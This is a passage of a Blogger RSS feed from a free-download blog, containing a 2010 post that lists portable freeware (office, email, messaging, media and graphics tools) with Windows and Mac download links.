<?xml version="1.0" encoding="UTF-8" standalone="no"?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>Zero Cost Download</title><description></description><managingEditor>noreply@blogger.com (Zero Cost Download)</managingEditor><pubDate>Sat, 3 May 2025 11:34:58 +0530</pubDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">338</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><link>http://0dl.blogspot.com/</link><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle/><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><xhtml:meta content="noindex" name="robots" xmlns:xhtml="http://www.w3.org/1999/xhtml"/><item><title>100+ Free Portable Apps</title><link>http://0dl.blogspot.com/2010/11/100-free-portable-apps.html</link><category>HaCkINg</category><author>noreply@blogger.com (Unknown)</author><pubDate>Mon, 22 Nov 2010 13:07:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6412960892729447333.post-8703168270412751550</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;This stuff can be installed on any portable drive, i.e. USB thumbdrive, PDA or an iPod. You can use them at work, school, or any other place where you can plugin your device. Check them out, you can either scroll-down for relevant category, i.e office software, email tools, messengers, games, etc. or get a ‘all-in-one’ package (all essential tools) . While there are more apps for windows users, I tried to include a mac version for each essential tool. All free. Enjoy!&lt;/div&gt;&lt;blockquote style="background-attachment: initial; background-clip: initial; background-color: #eeeeee; background-image: initial; background-origin: initial; border-bottom-color: rgb(221, 221, 221); border-bottom-style: solid; border-bottom-width: 1px; border-top-color: rgb(221, 221, 221); border-top-style: solid; border-top-width: 1px; color: #333333; font-family: Arial, Helvetica; font-size: 12px; font: normal normal normal 1em/normal Arial; line-height: 1.5em; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 10px; padding-bottom: 0px; padding-left: 10px; padding-right: 10px; padding-top: 10px;"&gt;&lt;div style="margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;What is a portable program ?&lt;/strong&gt;&amp;nbsp;: A portable program is a piece of software that you can carry around with you on a portable device and use on any other computer. It can be your email program, your browser, system recovery tools or even an operating system. The coolest part about it, is that all of your data and settings are always stored on a thumbdrive so when you unplug the device, none of your personal data is left behind.&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;span style="color: #4088b8; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Portable Office Software&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Abiword [&lt;a href="http://portableapps.com/apps/office/abiword_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable word processor"&gt;Win&lt;/a&gt;&amp;nbsp;(6.3 mb) /&amp;nbsp;&lt;a href="http://www.freesmug.org/portableapps/abiword/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable word for Mac"&gt;Mac&lt;/a&gt;&amp;nbsp;(9.5 mb)] – word processor (compatible with Microsoft word)&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;OpenOffice [&lt;a href="http://portableapps.com/apps/office/openoffice_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="open office portable"&gt;Win&lt;/a&gt;&amp;nbsp;(65 mb) /&amp;nbsp;&lt;a href="http://www.freesmug.org/portableapps/openoffice/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable open office for Mac"&gt;Mac&lt;/a&gt;&amp;nbsp;(127 mb)] – free alternative to Microsoft Office (fully compatible with Microsoft Office docs)&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;PDF Viewers:&amp;nbsp;&lt;a href="http://portableapps.com/apps/office/sumatra_pdf_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="pdf viewer"&gt;Sumatra&lt;/a&gt;&amp;nbsp;[Win (1.1 mb) ],&amp;nbsp;&lt;a href="http://www.snapfiles.com/get/foxitpdf.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Foxit PDF Reader&lt;/a&gt;&amp;nbsp;[Win, (1.8 mb) ]&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://notepad-plus.sourceforge.net/uk/site.htm" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;Notepad ++&lt;/a&gt;&amp;nbsp;– feature-rich Notepad replacement.&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="color: #4088b8; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Portable Email/Calendar/ToDo Programs&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Mozilla ThunderBird – [&lt;a href="http://portableapps.com/apps/internet/thunderbird_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="mozilla thunderbird client"&gt;Win&lt;/a&gt;&amp;nbsp;(6 mb),&amp;nbsp;&lt;a href="http://www.freesmug.org/portableapps/thunderbird/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable mozilla thunderbird for Mac"&gt;Mac&lt;/a&gt;&amp;nbsp;(20.5 mb),&amp;nbsp;&lt;a href="http://www.theplaceforitall.com/portablethunderbird/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Cross-Platform&lt;/a&gt;&amp;nbsp;(Win, Mac)] – very&amp;nbsp;&lt;a href="http://www.makeuseof.com/tag/switching-to-mozilla-thunderbird/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;good email client&lt;/a&gt;(built-in address book, import/export,&amp;nbsp;&lt;a href="https://addons.mozilla.org/en-US/thunderbird/recommended" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;tons of addons&lt;/a&gt;)&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Calendars:&amp;nbsp;&lt;a href="http://portableapps.com/apps/office/sunbird_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable calendar and todo"&gt;Mozilla Sunbird&lt;/a&gt;&amp;nbsp;[Win, 5.6mb],&amp;nbsp;&lt;a href="http://www.freesmug.org/portableapps/sunbird/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable calendar for Mac"&gt;Sunbird&lt;/a&gt;&amp;nbsp;[Mac, 9.7mb],&amp;nbsp;&lt;a href="http://portableapps.com/apps/office/lightning_extension" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Lightning&lt;/a&gt;&amp;nbsp;[Win, 1.3mb) - ThunderBird addon&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://osxportableapps.sourceforge.net/p_mail/index.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Mail&lt;/a&gt;&amp;nbsp;[Mac] – requires locally installed Mail.app&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://osxportableapps.sourceforge.net/p_ical/index.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable iCal"&gt;iCal&lt;/a&gt;&amp;nbsp;[Mac] – requires locally installed iCal.app&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://osxportableapps.sourceforge.net/p_addressbook/index.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Address Book&lt;/a&gt;&amp;nbsp;[Mac] – requires locally installed Address Book&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/qm.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable mailer"&gt;Quick Mailer&lt;/a&gt;&amp;nbsp;[Win, 20kb] – tiny program for sending quick e-mail messages&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://gdisk.sourceforge.net/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="gmail drive"&gt;gDisk&lt;/a&gt;&amp;nbsp;[Mac, 1020kb] – handy program that turns your gmail account into a portable hard drive. (More&lt;a href="http://www.makeuseof.com/tag/gmail-craze-30-tools-to-make-your-gmail-better/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;stuff for gmail&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="color: #4088b8; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="color: #4088b8; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Portable Text and Voice Messengers&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;All-in-One (Yahoo, MSN, ICQ, etc.):&amp;nbsp;&lt;a href="http://portableapps.com/apps/internet/gaim_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable gaim"&gt;Gaim&lt;/a&gt;&amp;nbsp;[Win, 6.9 mb],&amp;nbsp;&lt;a href="http://portableapps.com/apps/internet/miranda_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Miranda IM&lt;/a&gt;&amp;nbsp;[Win, 1.2 mb],&amp;nbsp;&lt;a href="http://www.freesmug.org/portableapps/adium/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Adium&lt;/a&gt;&amp;nbsp;[Mac, 15.5mb],&lt;a href="http://www.trilliananywhere.com/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable trillian"&gt;Trillian&lt;/a&gt;&amp;nbsp;[Win]&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://osxportableapps.sourceforge.net/p_ichat/index.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable iChat"&gt;iChat&lt;/a&gt;&amp;nbsp;[Mac] – requires locally installed iChat&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.freesmug.org/portableapps/newspeak/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable IRC client"&gt;Newspeak&lt;/a&gt;&amp;nbsp;[Mac, 1mb] – Newspeak Cocoa IRC client&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.gruups.com/usbskype/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Skype&lt;/a&gt;&amp;nbsp;– exlpains how to make skype portable&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="color: #4088b8; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Portable Media Tools (Audio / Video)&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Audacity [&lt;a href="http://portableapps.com/apps/music_video/audacity_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="audio editor and recorder"&gt;Win&lt;/a&gt;&amp;nbsp;(2.4 mb),&amp;nbsp;&lt;a href="http://www.freesmug.org/portableapps/audacity/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable audio editor for Mac"&gt;Mac&lt;/a&gt;&amp;nbsp;(5mb)] – simple audio editor and recorder&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;VLC [&lt;a href="http://portableapps.com/apps/music_video/vlc_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable video player"&gt;Win&lt;/a&gt;&amp;nbsp;(9.3 mb),&amp;nbsp;&lt;a href="http://www.freesmug.org/portableapps/vlc/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable video player for Mac"&gt;Mac&lt;/a&gt;&amp;nbsp;(24 mb)] – powerful media player that plays almost all popular audio and video formats&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://jeanmatthieu.free.fr/ishout/index.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;iShout&lt;/a&gt;&amp;nbsp;[Mac, 7mb] – record and listen to your favorite internet radios.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://jeanmatthieu.free.fr/cocoajt/index.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;CocoaJT&lt;/a&gt;&amp;nbsp;[Mac, 8.7mb] – stream live TV programs from major broadcast channels.&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="color: #4088b8; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Portable Graphics Viewers and Image Editors&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;GIMP [&lt;a href="http://portableapps.com/apps/graphics_pictures/gimp_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable image editor"&gt;Win&lt;/a&gt;&amp;nbsp;(8.6 mb),&amp;nbsp;&lt;a href="http://www.freesmug.org/portableapps/gimp/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable GIMP for Mac users"&gt;Mac&lt;/a&gt;&amp;nbsp;(87.5 mb)] – free alternative to Photoshop&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.irfanview.com/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;IrfanView&lt;/a&gt;&amp;nbsp;[Win, 1013kb] – fast graphic viewer with basic image editing features&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://perso.orange.fr/pierre.g/xnview/enxnview.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="image viewer and converter"&gt;XNView&lt;/a&gt;&amp;nbsp;[Win, Mac, Linux] – image viewer and converter (supports more then 400 image formats)&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.freesmug.org/portableapps/inkscape/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Inkscape&lt;/a&gt;&amp;nbsp;[Mac, 24.6mb] – scalable vector graphics editor&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="color: #4088b8; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Portable Browsers and Internet Tools (FTP, Feedreaders, Torrent Clients…)&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; 